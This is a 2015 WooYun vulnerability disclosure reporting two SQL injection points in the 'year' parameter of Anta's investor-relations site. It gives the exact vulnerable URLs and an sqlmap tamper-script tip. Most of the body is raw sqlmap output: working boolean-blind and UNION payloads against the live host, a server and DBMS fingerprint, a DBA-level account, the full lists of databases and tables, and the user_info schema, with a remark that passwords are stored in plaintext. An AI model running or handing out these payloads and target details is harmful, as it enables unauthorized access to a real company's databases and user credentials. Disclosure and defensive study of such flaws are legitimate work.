当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120823

漏洞标题:安踏某网站SQL注入两处(之前未修复一处)(影响多个库)

相关厂商:anta.com

漏洞作者: 路人甲

提交时间:2015-06-16 16:53

修复时间:2015-06-21 16:54

公开时间:2015-06-21 16:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-16: 细节已通知厂商并且等待厂商处理中
2015-06-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

SQL注入涉及大量数据库
某表中用户密码明文存储居然
两处sql注入:
注入点1:

http://ir.anta.com/sc/home.php?id=4&Itemid=3&option=3&year=*


参数year存在注入
注入点2:

http://ir.anta.com/tc/home.php?id=4&Itemid=3&option=3&year=*


 WooYun: 安踏SQL注入漏洞可影响多个站点 


这个注入点,厂商已经确认一年多了,竟然还未修复???是忘了吗?
sqlmap跑的时候注意下需要加参数--tamper=space2morehash.py

1.jpg


漏洞证明:

sqlmap identified the following injection points with a total of 331 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' RLIKE (SELECT (CASE WHEN (8257=8257) THEN '' ELSE 0x28 END)) AND 'gKeW'='gKeW
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Type: UNION query
Title: Generic UNION query (NULL) - 22 columns
Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x447347527547427a4565,0x7162717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' RLIKE (SELECT (CASE WHEN (8257=8257) THEN '' ELSE 0x28 END)) AND 'gKeW'='gKeW
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Type: UNION query
Title: Generic UNION query (NULL) - 22 columns
Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x447347527547427a4565,0x7162717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.4.40
back-end DBMS: MySQL >= 5.0.0
current user: 'tomocms2@%'
current database: 'tomocms2'
current user is DBA: True
available databases [54]:
[*] aastocks_db
[*] bboard
[*] bboard2
[*] bboard2_20101231
[*] chinastarch1
[*] cks
[*] cks_new
[*] community
[*] community_20101231
[*] doubleindex
[*] ginsengnatural
[*] glkg
[*] hds
[*] hds_2009
[*] information_schema
[*] jiuhao
[*] kotocms003
[*] kotoportal003
[*] l_xingyecopper
[*] maryhelp
[*] maryhelp_20140709
[*] mh
[*] midea
[*] mysql
[*] mysql_old
[*] new-ray
[*] newworld
[*] newworld_20131210
[*] newworld_demo
[*] ntop
[*] onlinereport
[*] performance_schema
[*] report
[*] samkadm_cms
[*] smart_xtep
[*] smart_xtep_20100106
[*] snowkiss
[*] tdn
[*] test
[*] tomocms
[*] tomocms2
[*] tomocms2_center
[*] tomocms2_cn
[*] tomocms2_export
[*] tomocms2_my
[*] tomocms2_restore
[*] tomocms2_sg
[*] tomocms2_temp
[*] tomocms2_tw
[*] tomocms2copy
[*] view_db
[*] web2project
[*] wordpress
[*] xinhuapinmei
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' RLIKE (SELECT (CASE WHEN (8257=8257) THEN '' ELSE 0x28 END)) AND 'gKeW'='gKeW
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Type: UNION query
Title: Generic UNION query (NULL) - 22 columns
Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x447347527547427a4565,0x7162717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.4.40
back-end DBMS: MySQL >= 5.0.0
Database: tomocms2
[218 tables]
+-----------------------------------+
| language |
| showcases_record_history.20140823 |
| tomocms2_center.cms_content_press |
| alert_form |
| client_index |
| client_info |
| client_infoen |
| client_infosc |
| client_infotc |
| cms_alert |
| cms_content |
| cms_content_115 |
| cms_content_3 |
| cms_content_312 |
| cms_content_313 |
| cms_content_314 |
| cms_content_38 |
| cms_content_3_38 |
| cms_content_3_4_38 |
| cms_content_4 |
| cms_content_5 |
| cms_content_7 |
| cms_content_76 |
| cms_content_7_76 |
| cms_content_delete |
| cms_content_highlight |
| cms_content_jrj |
| cms_content_scio |
| cms_header |
| cms_header_client |
| cms_index |
| cms_index_client |
| cms_info |
| cms_info_client |
| cmsgroup_info |
| cmsgroup_info_client |
| company_details_1_en |
| company_details_1_tc |
| company_details_2_en |
| company_details_2_tc |
| email_alert |
| email_template |
| enquiry_form |
| exchange_code |
| feedback_app |
| fileview |
| ftp_accounts |
| ftp_accounts_20140207 |
| function1 |
| function10 |
| function10_css |
| function10_list |
| function10_list_default |
| function11 |
| function12 |
| function13 |
| function13_area06 |
| function14 |
| function15 |
| function16 |
| function2 |
| function3 |
| function4 |
| function5 |
| function6 |
| function7 |
| function8 |
| function9 |
| hkex_alert_counter |
| hkex_alert_headline |
| hkex_alert_queue |
| hkex_alert_record |
| hkex_alert_record_new |
| hkex_alert_record_new_problem |
| hkex_alert_record_problem |
| hkex_alert_record_testing |
| hkex_scan |
| httpd_accounts |
| industry_code |
| item |
| mod03_records |
| mod03_records_app |
| mod1 |
| mod10_info |
| mod11_info |
| mod11_info_backup |
| mod12_info |
| mod12_info_backup |
| mod14_info |
| mod15_caption_info |
| mod15_caption_info_backup |
| mod15_info_0 |
| mod15_info_0_20131120 |
| mod15_info_0_backup |
| mod15_info_1 |
| mod15_info_1_backup |
| mod15_info_2 |
| mod15_info_2_backup |
| mod15_label_info |
| mod15_label_info_backup |
| mod15_ppt_info |
| mod15_ppt_info_backup |
| mod17_info |
| mod18_history |
| mod18_info_old |
| mod18_schedule_old |
| mod18_smallchart |
| mod18_temp |
| mod19_info |
| mod1_csv_record |
| mod1_email_record |
| mod1_info |
| mod21_content |
| mod21_csv_record |
| mod21_email_record |
| mod21_info |
| mod22_content |
| mod22_content_backup |
| mod22_csv_record |
| mod22_email_record |
| mod22_info |
| mod23_email |
| mod23_info |
| mod23_live |
| mod23_log |
| mod23_pass |
| mod23_qa |
| mod23_record |
| mod23_reminder |
| mod24_color |
| mod24_info |
| mod25_content |
| mod25_info |
| mod26_content |
| mod26_info |
| mod28_color |
| mod28_info |
| mod28_pm |
| mod29_info |
| mod2_info |
| mod30_color |
| mod30_info |
| mod31_info |
| mod32_info |
| mod32_pm |
| mod33_setting |
| mod6_holiday |
| mod6_info |
| mod8_info |
| mod9_delete |
| mod9_field |
| mod9_info |
| mod9_info_20130128 |
| mod9_info_20130311 |
| mod9_info_20130428 |
| mod9_info_backup |
| mod9_info_category |
| mod9_info_client |
| mod9_info_country |
| mod9_info_country_change |
| mod9_info_email |
| mod9_info_migrate |
| mod9_info_new |
| mod9_info_new_20140227 |
| mod9_info_new_20140228 |
| mod9_info_new_toni |
| mod9_info_press8 |
| mod9_info_press9 |
| mod9_info_problem |
| mod9_info_setting |
| mod9_info_title |
| mod9_info_title_change |
| mod9_setting |
| mod_index |
| modright_info |
| news01 |
| news02 |
| news_final |
| news_records |
| news_source |
| pageview |
| pageview2 |
| pageview2_last |
| pageview3 |
| pageview3_last |
| pageview4 |
| pageview4_session |
| pageview_last |
| photo_log |
| photo_login |
| promotion_content |
| promotion_index |
| request_content |
| request_content_complete |
| request_content_new |
| request_email |
| request_header |
| request_index |
| request_status |
| resize_pic |
| showcases_record |
| showcases_record_history |
| smic_contact_form |
| survey_content |
| survey_header |
| todayir_industry_code |
| type_code |
| type_code_china |
| user_index |
| user_info |
| user_log |
| userright_info |
| video_auth |
| video_chat |
| video_log |
| voting_result |
| voting_result_new |
| wpip |
+-----------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' RLIKE (SELECT (CASE WHEN (8257=8257) THEN '' ELSE 0x28 END)) AND 'gKeW'='gKeW
Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
Type: UNION query
Title: Generic UNION query (NULL) - 22 columns
Payload: http://ir.anta.com:80/sc/home.php?id=4&Itemid=3&option=3&year=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x447347527547427a4565,0x7162717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.4.40
back-end DBMS: MySQL >= 5.0.0
Database: tomocms2
Table: user_info
[9 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| admin | varchar(1) |
| clientid | int(5) |
| email | varchar(100) |
| item | int(3) |
| lang | varchar(2) |
| login | varchar(40) |
| password | varchar(32) |
| status | varchar(1) |
| userid | int(5) |
+----------+--------------+


密码明文存储,大量弱口令密码

2.jpg

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-21 16:54

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无